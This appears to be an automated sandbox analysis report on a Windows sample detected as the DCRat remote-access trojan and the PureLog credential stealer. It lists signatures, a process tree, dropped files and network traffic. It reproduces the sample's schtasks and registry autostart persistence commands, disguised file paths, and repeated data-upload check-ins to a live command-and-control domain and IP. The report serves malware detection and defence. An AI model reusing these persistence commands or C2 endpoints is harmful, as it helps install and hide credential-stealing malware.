Windows Analysis Report
62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe

Overview

General Information

Sample name: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe
Analysis ID: 1467031
MD5: 6667f954763eeacf7effcf5a5c25e695
SHA1: 6db1fba1cd1181b921cdadeba24c69cd680be825
SHA256: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab52da72ad712a57597b4
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe (PID: 7704 cmdline: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
    • csc.exe (PID: 7196 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7436 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD41E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC76655AD3B5B14A58A99CB3ECAE1D1A90.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 7500 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7528 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD631.tmp" "c:\Windows\System32\CSC9D0BE8EB87641DFA2B4851BB05AFB2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 7500 cmdline: schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 9 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7780 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8104 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 8180 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
    • StartMenuExperienceHost.exe (PID: 7196 cmdline: "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • upfc.exe (PID: 6960 cmdline: "C:\Program Files (x86)\java\jre-1.8\upfc.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
    • schtasks.exe (PID: 7556 cmdline: schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7696 cmdline: schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7864 cmdline: schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 14 /tr "'C:\Recovery\llflCdrMcgGB.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 1240 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 8140 cmdline: schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3468 cmdline: schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7292 cmdline: schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 6 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7504 cmdline: schtasks.exe /create /tn "llflCdrMcgGB" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7220 cmdline: schtasks.exe /create /tn "llflCdrMcgGBl" /sc MINUTE /mo 8 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5852 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7540 cmdline: schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2112 cmdline: schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 5 /tr "'C:\Program Files\7-Zip\Lang\upfc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7560 cmdline: schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab" /sc ONLOGON /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7696 cmdline: schtasks.exe /create /tn "62b1bf60394248d2c743ec6df0935d58e5009c9e04aab6" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • upfc.exe (PID: 6764 cmdline: "C:\Program Files (x86)\java\jre-1.8\upfc.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • llflCdrMcgGB.exe (PID: 8152 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • llflCdrMcgGB.exe (PID: 7296 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • StartMenuExperienceHost.exe (PID: 7364 cmdline: "C:\Users\All Users\Application Data\Start Menu\StartMenuExperienceHost.exe" MD5: 6667F954763EEACF7EFFCF5A5C25E695)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Java\jre-1.8\upfc.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Java\jre-1.8\upfc.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Java\jre-1.8\upfc.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000011.00000002.2485222023.00000000034FF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000002.1308539663.0000000012A69000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1240706650.00000000003B2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000011.00000002.2485222023.000000000378E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000011.00000002.2485222023.0000000003076000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe.3b0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7500, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\java\jre-1.8\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessId: 7704, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\java\jre-1.8\upfc.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessId: 7704, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Source: Process started, Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe", ParentImage: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ParentProcessId: 7704, ParentProcessName: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", ProcessId: 7196, ProcessName: csc.exe
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessId: 7704, TargetFilename: C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline

Data Obfuscation

Source: Process started, Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe", ParentImage: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ParentProcessId: 7704, ParentProcessName: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.cmdline", ProcessId: 7196, ProcessName: csc.exe

Timestamp: 07/03/24-16:42:09.488839, SID: 2048095, Source Port: 49707, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 07/03/24-16:43:02.458952, SID: 2048095, Source Port: 49785, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 07/03/24-16:43:34.748698, SID: 2048095, Source Port: 49830, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected

AV Detection

Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, Avira: detected
Source: C:\Users\user\Desktop\FUSHtkHk.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\llflCdrMcgGB.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\jjSkKJFG.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\PDlWdMMS.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\WAeZ9wWpbS.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\rUKsZmvt.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, ReversingLabs: Detection: 72%
Source: C:\Program Files\7-Zip\Lang\upfc.exe, ReversingLabs: Detection: 72%
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, ReversingLabs: Detection: 72%
Source: C:\Recovery\llflCdrMcgGB.exe, ReversingLabs: Detection: 72%
Source: C:\Users\user\Desktop\PDlWdMMS.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\rUKsZmvt.log, ReversingLabs: Detection: 70%
Source: C:\Windows\BitLockerDiscoveryVolumeContents\llflCdrMcgGB.exe, ReversingLabs: Detection: 72%
Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, ReversingLabs: Detection: 72%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Joe Sandbox ML: detected
Source: C:\Recovery\llflCdrMcgGB.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\PDlWdMMS.log, Joe Sandbox ML: detected
Source: C:\ProgramData\Microsoft\Windows\Start Menu\StartMenuExperienceHost.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\wlyrJHCD.log, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AHphtSeX.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\rUKsZmvt.log, Joe Sandbox ML: detected
Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, Joe Sandbox ML: detected
Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, Directory created: C:\Program Files\7-Zip\Lang\upfc.exe
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, Directory created: C:\Program Files\7-Zip\Lang\ea1d8f6d871115
Source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: upfc.exe, 00000011.00000002.2534120131.000000001C7E3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\k1wttop3\k1wttop3.pdb source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\pb5w2chy\pb5w2chy.pdb source: 62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, 00000000.00000002.1298963270.00000000030A6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdb source: upfc.exe, 00000011.00000002.2534120131.000000001C7E3000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Program Files (x86)\Java\jre-1.8\upfc.exe, Renamed to system file: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.exe, File opened: C:\Users\user

Networking

Source: Traffic, Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.10:49707 -> 188.114.97.3:80
Source: Traffic, Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.10:49785 -> 188.114.97.3:80
Source: Traffic, Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.10:49830 -> 188.114.97.3:80
Source: Joe Sandbox View, IP Address: 188.114.97.3
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: global traffic, HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 384 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1060 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1756 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1056 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 154732 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1772 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: podval.top | Content-Length: 1060 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1748Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 500Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 1060Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: podval.topContent-Length: 2048Expect: 100-continueConnection: Keep-Alive
